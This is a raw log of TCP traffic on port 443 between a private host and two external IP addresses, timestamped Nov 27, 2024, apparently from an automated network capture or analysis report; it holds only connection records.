                                                  Nov 27, 2024 18:10:02.113902092 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.113910913 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.113950014 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.137592077 CET4434979013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:02.137733936 CET4434979013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:02.137844086 CET49790443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:02.138071060 CET49790443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:02.138087988 CET4434979013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:02.152494907 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.152515888 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.152612925 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.152621984 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.152666092 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.176785946 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.176809072 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.176919937 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.176930904 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.176975012 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.198914051 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.198930979 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.199042082 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.199048996 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.199088097 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.216027021 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.216042995 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.216105938 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.216111898 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.216146946 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.233762026 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.233778000 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.233856916 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.233864069 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.233902931 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.253164053 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.253179073 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.253266096 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.253273964 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.253314972 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.301558018 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.301577091 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.301660061 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.301670074 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.301707029 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.314433098 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.314444065 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.314536095 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.314543962 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.314587116 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.326486111 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.326503992 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.326608896 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.326621056 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.326662064 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.336301088 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.336318970 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.336421013 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.336429119 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.336462021 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.347009897 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.347027063 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.347127914 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.347136021 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.347183943 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.356640100 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.356656075 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.356746912 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.356755972 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.356792927 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.366833925 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.366849899 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.366940975 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.366954088 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.366988897 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.396738052 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.396756887 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.396888018 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.396899939 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.396943092 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.502110958 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.502130985 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.502259970 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.502278090 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.502320051 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.509713888 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.509733915 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.509810925 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.509816885 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.509855986 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.517061949 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.517077923 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.517142057 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.517149925 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.517188072 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.525059938 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.525094986 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.525186062 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.525194883 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.525229931 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.532222986 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.532250881 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.532288074 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.532294989 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.532318115 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.532330990 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.540478945 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.540498018 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.540560961 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.540568113 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.540596962 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.547418118 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.547436953 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.547523975 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.547559977 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.547610998 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.597965002 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.597986937 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.598093987 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.598123074 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.598167896 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.703632116 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.703658104 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.703763962 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.703790903 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.703841925 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.709978104 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.709994078 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.710071087 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.710095882 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.710113049 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.710141897 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.716171980 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.716187954 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.716270924 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.716295958 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.716340065 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.722759962 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.722779036 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.722857952 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.722882986 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.722923994 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.729729891 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.729747057 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.729809046 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.729816914 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.729859114 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.735774040 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.735789061 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.735841990 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.735848904 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.735888004 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.741677046 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.741693020 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.741776943 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.741801023 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.741842031 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.799552917 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.799571991 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.799643040 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.799654961 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.799695015 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.904958963 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.904978991 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.905055046 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.905066967 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.905103922 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.910907030 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.910921097 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.910974026 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.910980940 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.911012888 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.917582989 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.917598009 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.917638063 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.917644024 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.917681932 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.924175024 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.924190044 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.924247026 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.924252987 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.924284935 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.930134058 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.930149078 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.930197954 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.930203915 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.930242062 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.930887938 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.930974007 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.931029081 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.931222916 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.931246042 CET4434979894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.931255102 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.931293011 CET49798443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.938591003 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.938633919 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.938697100 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.939124107 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.939137936 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.944538116 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.944580078 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.944644928 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.945628881 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:02.945647955 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:02.948919058 CET49811443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:02.948940039 CET4434981113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:02.948992968 CET49811443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:02.949804068 CET49811443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:02.949815035 CET4434981113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.335990906 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:03.336276054 CET49808443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:03.336293936 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:03.336638927 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:03.337100029 CET49808443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:03.337162971 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:03.337342024 CET49808443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:03.337357044 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:03.471254110 CET4434980313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.472445965 CET49803443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.472466946 CET4434980313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.473268986 CET49803443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.473273993 CET4434980313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.538115978 CET4434980513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.538716078 CET49805443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.538737059 CET4434980513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.539333105 CET49805443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.539338112 CET4434980513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.559528112 CET4434980713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.560228109 CET49807443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.560245991 CET4434980713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.560786009 CET49807443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.560791016 CET4434980713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.597407103 CET4434980613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.598062992 CET49806443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.598146915 CET4434980613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.598535061 CET49806443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.598552942 CET4434980613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.600295067 CET4434980413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.600718975 CET49804443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.600752115 CET4434980413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.601084948 CET49804443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.601092100 CET4434980413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.921504974 CET4434980313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.921603918 CET4434980313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.921704054 CET49803443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.921987057 CET49803443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.922004938 CET4434980313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.922029972 CET49803443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.922036886 CET4434980313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.926338911 CET49812443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.926373005 CET4434981213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.926454067 CET49812443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.926630020 CET49812443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.926641941 CET4434981213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.975429058 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:03.982110023 CET4434980513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.982186079 CET4434980513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.982477903 CET49805443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.982530117 CET49805443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.982539892 CET4434980513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.982562065 CET49805443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.982566118 CET4434980513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.986054897 CET49813443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.986152887 CET4434981313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:03.986254930 CET49813443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.986543894 CET49813443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:03.986588001 CET4434981313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.001971960 CET4434980713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.002041101 CET4434980713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.002574921 CET49807443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.002615929 CET49807443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.002624035 CET4434980713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.002644062 CET49807443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.002649069 CET4434980713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.005573034 CET49814443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.005588055 CET4434981413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.005661011 CET49814443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.005830050 CET49814443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.005841017 CET4434981413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.029805899 CET49808443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:04.029824972 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.051558971 CET4434980613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.051635027 CET4434980613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.051928043 CET49806443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.051980019 CET49806443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.052011967 CET4434980613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.052056074 CET49806443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.052068949 CET4434980613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.055157900 CET49815443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.055190086 CET4434981513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.055273056 CET49815443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.055494070 CET49815443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.055521011 CET4434981513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.075887918 CET49808443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:04.081012011 CET4434980413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.081161022 CET4434980413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.081284046 CET49804443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.081584930 CET49804443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.081584930 CET49804443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.081609964 CET4434980413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.081633091 CET4434980413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.085056067 CET49816443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.085107088 CET4434981613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.085210085 CET49816443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.085418940 CET49816443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.085436106 CET4434981613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.176544905 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.176558971 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.176582098 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.176588058 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.176605940 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.176671982 CET49808443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:04.176697969 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.176714897 CET49808443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:04.176757097 CET49808443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:04.177541018 CET49808443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:04.177556038 CET4434980894.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.300858974 CET4434978913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.300970078 CET4434978913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.301270008 CET49789443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.301368952 CET49789443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.301386118 CET4434978913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.430551052 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.431197882 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:04.431230068 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.431602001 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.431953907 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:04.432022095 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.432147026 CET49809443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:04.432161093 CET4434980994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.480950117 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.481266022 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:04.481281042 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.481647015 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.481969118 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:04.482033014 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.482146025 CET49810443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:10:04.482177019 CET4434981094.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:10:04.885868073 CET4434981113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.886164904 CET49811443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.886195898 CET4434981113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.887468100 CET4434981113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.887794018 CET49811443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.887943029 CET49811443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:10:04.887948036 CET4434981113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:10:04.887964964 CET49811443192.168.2.613.107.246.63
